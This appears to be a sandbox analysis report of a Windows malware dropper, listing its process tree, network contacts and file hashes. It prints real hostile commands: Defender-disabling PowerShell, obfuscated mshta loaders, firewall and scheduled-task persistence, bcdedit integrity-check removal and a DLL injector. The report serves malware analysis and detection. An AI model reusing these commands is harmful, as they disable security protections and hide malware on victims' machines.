PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2100 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2692 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe

"C:\Users\Admin\AppData\Local\Temp\9d3b35dd52759c54dfe1d0b2853de31a745836acbbd30834237e24ea9f3a243d.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue121e696b2d94fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue120ba2d3df.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12b645e6648.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue127d1be88dd70f8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12b505de68357.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12536443c2c8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1239d4b60d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1264f7b252.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue129ba086d712.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue125fd9410f80dd6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue127ff3b5477.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue123e8bf9beda40e5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12d6c3a590f5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue122eaa5d903b51f3.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue12f72da5484b.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127d1be88dd70f8.exe

Tue127d1be88dd70f8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe

Tue121e696b2d94fe.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe

Tue1239d4b60d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue127ff3b5477.exe

Tue127ff3b5477.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe

Tue129ba086d712.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe

Tue12d6c3a590f5c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b505de68357.exe

Tue12b505de68357.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12b645e6648.exe

Tue12b645e6648.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe

Tue12f72da5484b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe

Tue1264f7b252.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe

Tue120ba2d3df.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue125fd9410f80dd6.exe

Tue125fd9410f80dd6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue121e696b2d94fe.exe" -u

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12536443c2c8.exe

Tue12536443c2c8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue122eaa5d903b51f3.exe

Tue122eaa5d903b51f3.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe

Tue123e8bf9beda40e5.exe

C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp

"C:\Users\Admin\AppData\Local\Temp\is-9HKSK.tmp\Tue129ba086d712.tmp" /SL5="$70192,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbSCRIPT: CLoSe ( CreAtEoBject ( "WSCrIPT.sheLL" ). RUn ( "cmD.ExE /q /r TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe"" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If """" == """" for %h IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe"" ) do taskkill /F -Im ""%~Nxh"" " , 0 , trUe ) )

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-P53VS.tmp\Tue123e8bf9beda40e5.tmp" /SL5="$6015E,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue123e8bf9beda40e5.exe"

C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp

"C:\Users\Admin\AppData\Local\Temp\is-D78U2.tmp\Tue129ba086d712.tmp" /SL5="$70160,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue129ba086d712.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 448 -s 272

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /r TYPe "C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If "" == "" for %h IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue120ba2d3df.exe" ) do taskkill /F -Im "%~Nxh"

C:\Users\Admin\AppData\Local\Temp\YFBh.exE

YFBH.EXe -pM6ql1llc4LCunhpM

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Tue120ba2d3df.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbSCRIPT: CLoSe ( CreAtEoBject ( "WSCrIPT.sheLL" ). RUn ( "cmD.ExE /q /r TYPe ""C:\Users\Admin\AppData\Local\Temp\YFBh.exE"" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If ""-pM6ql1llc4LCunhpM "" == """" for %h IN ( ""C:\Users\Admin\AppData\Local\Temp\YFBh.exE"" ) do taskkill /F -Im ""%~Nxh"" " , 0 , trUe ) )

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12d6c3a590f5c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1239d4b60d.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /r TYPe "C:\Users\Admin\AppData\Local\Temp\YFBh.exE" > YFBh.exE && staRt YFBH.EXe -pM6ql1llc4LCunhpM & If "-pM6ql1llc4LCunhpM " == "" for %h IN ( "C:\Users\Admin\AppData\Local\Temp\YFBh.exE" ) do taskkill /F -Im "%~Nxh"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241109212805.log C:\Windows\Logs\CBS\CbsPersist_20241109212805.cab

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCrIpT: clOSe ( CreATEObjeCt ( "WsCriPT.sheLL" ). ruN ( "Cmd.exe /q /c Echo | SeT /P = ""MZ"" > ylDS9MD.oZ & CoPy /B /Y YlDS9MD.OZ + 7YBr4YIV.4 + L8jNB.A + Kkyl.Ybx + YHDI9E.EIU + KsN5NH.WJU NKGtN.2& STaRt control .\NKGTN.2 " , 0 , trUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c Echo | SeT /P = "MZ" > ylDS9MD.oZ& CoPy /B /Y YlDS9MD.OZ + 7YBr4YIV.4 + L8jNB.A + Kkyl.Ybx + YHDI9E.EIU + KsN5NH.WJU NKGtN.2& STaRt control .\NKGTN.2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>ylDS9MD.oZ"

C:\Windows\SysWOW64\control.exe

control .\NKGTN.2

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\NKGTN.2

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue12f72da5484b.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files (x86)\Gparted\Build.sfx.exe

"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1

C:\Program Files (x86)\Gparted\Build.exe

"C:\Program Files (x86)\Gparted\Build.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Program Files (x86)\Gparted\gimagex.exe

"C:\Program Files (x86)\Gparted\gimagex.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "93478235813389613141469676073-1481490987-849097770-411083071-256084815-1993590202"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /306-306

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-130913910907659240-117405465-1152408639-1249432833413201776-3437839801289592925"

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-3089677442696828811337722847-2117008512-245034745-14781113735556310801475178297"

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\NKGTN.2

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\NKGTN.2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 1668

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country  Destination          Domain                                                 Proto
FR       212.193.30.45:80                                                            tcp
US       8.8.8.8:53           www.listincode.com                                     udp
US       8.8.8.8:53           56.jpgamehome.com                                      udp
US       8.8.8.8:53           tweakballs.com                                         udp
US       52.203.72.196:443    www.listincode.com                                     tcp
US       8.8.8.8:53           webdatingcompany.me                                    udp
US       8.8.8.8:53           cdn.discordapp.com                                     udp
US       162.159.134.233:443  cdn.discordapp.com                                     tcp
US       8.8.8.8:53           all-mobile-pa1ments.com.mx                             udp
US       8.8.8.8:53           buy-fantasy-football.com.sg                            udp
US       8.8.8.8:53           buy-fantasy-gxmes.com.sg                               udp
US       8.8.8.8:53           topniemannpickshop.cc                                  udp
US       8.8.8.8:53           iplogger.org                                           udp
US       172.67.74.161:443    iplogger.org                                           tcp
US       172.67.74.161:443    iplogger.org                                           tcp
US       54.205.158.59:443    www.listincode.com                                     tcp
US       8.8.8.8:53           ip-api.com                                             udp
US       208.95.112.1:80      ip-api.com                                             tcp
US       172.67.74.161:443    iplogger.org                                           tcp
FR       91.121.67.60:51630                                                          tcp
DE       49.12.219.50:4846                                                           tcp
US       8.8.8.8:53           c.pki.goog                                             udp
GB       142.250.187.227:80   c.pki.goog                                             tcp
DE       49.12.219.50:4846                                                           tcp
NL       185.154.15.4:21735                                                          tcp
DE       49.12.219.50:4846                                                           tcp
FR       212.193.30.29:80                                                            tcp
US       8.8.8.8:53           www.google.com                                         udp
DE       49.12.219.50:4846                                                           tcp
DE       49.12.219.50:4846                                                           tcp
FR       91.121.67.60:51630                                                          tcp
DE       49.12.219.50:4846                                                           tcp
US       8.8.8.8:53           www.yahoo.com                                          udp
US       8.8.8.8:53           pastebin.com                                           udp
US       104.20.4.235:443     pastebin.com                                           tcp
US       8.8.8.8:53           wfsdragon.ru                                           udp
US       104.21.5.208:80      wfsdragon.ru                                           tcp
DE       212.192.241.62:80                                                           tcp
NL       185.154.15.4:21735                                                          tcp
US       8.8.8.8:53           trumops.com                                            udp
US       8.8.8.8:53           www.yahoo.com                                          udp
US       8.8.8.8:53           retoti.com                                             udp
US       8.8.8.8:53           logs.trumops.com                                       udp
US       8.8.8.8:53           logs.retoti.com                                        udp
DE       49.12.219.50:4846                                                           tcp
US       8.8.8.8:53           bfdeedc9-3ac6-448e-a6f3-60a0bcb893c2.uuid.trumops.com  udp
US       8.8.8.8:53           server10.trumops.com                                   udp
US       44.221.84.105:443    server10.trumops.com                                   tcp
US       8.8.8.8:53           bitbucket.org                                          udp
IE       185.166.142.21:443   bitbucket.org                                          tcp
US       8.8.8.8:53           msdl.microsoft.com                                     udp
US       204.79.197.219:443   msdl.microsoft.com                                     tcp
DE       49.12.219.50:4846                                                           tcp
US       8.8.8.8:53           vsblobprodscussu5shard30.blob.core.windows.net         udp
US       20.150.79.68:443     vsblobprodscussu5shard30.blob.core.windows.net         tcp
DE       49.12.219.50:4846                                                           tcp
FR       91.121.67.60:51630                                                          tcp
DE       49.12.219.50:4846                                                           tcp
NL       185.154.15.4:21735                                                          tcp
DE       49.12.219.50:4846                                                           tcp
DE       49.12.219.50:4846                                                           tcp
DE       49.12.219.50:4846                                                           tcp
US       8.8.8.8:53           vsblobprodscussu5shard20.blob.core.windows.net         udp
US       20.150.79.68:443     vsblobprodscussu5shard20.blob.core.windows.net         tcp
FR       91.121.67.60:51630                                                          tcp
DE       49.12.219.50:4846                                                           tcp
US       72.84.118.132:8080                                                          tcp
DE       49.12.219.50:4846                                                           tcp
NL       185.154.15.4:21735                                                          tcp
DE       49.12.219.50:4846                                                           tcp
DE       49.12.219.50:4846                                                           tcp
FR       91.121.67.60:51630                                                          tcp
DE       49.12.219.50:4846                                                           tcp
US       72.84.118.132:8080                                                          tcp
DE       49.12.219.50:4846                                                           tcp
NL       185.154.15.4:21735                                                          tcp
DE       49.12.219.50:4846                                                           tcp
DE       49.12.219.50:4846                                                           tcp
US       8.8.8.8:53           dumancue.com                                           udp
FR       91.121.67.60:51630                                                          tcp
DE       49.12.219.50:4846                                                           tcp
DE       49.12.219.50:4846                                                           tcp

Files

\Users\Admin\AppData\Local\Temp\7zSC5B35246\setup_install.exe

MD5 653f5bbaac95d546bb4c5c7557b25c22
SHA1 346e064735ca5abe0963288dd342d7ea058bb61a
SHA256 d427e3e6fb34458f934fbe1f61ee8a480f84d2d20bf3fcc436e772593d2d5f12
SHA512 1feeab3ade970823abba275110655beac744eb34e59a47c7058bccde0beb699999f627e7b1abbee1f76db6a3e4780781fe3b88c7c798a5639d6b458d35f6a446

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSC5B35246\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2692-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC5B35246\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2692-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC5B35246\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zSC5B35246\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2692-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2692-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2692-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2692-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2692-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2692-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2692-75-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2692-74-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2692-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2692-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2692-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2692-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC5B35246\Tue1264f7b252.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
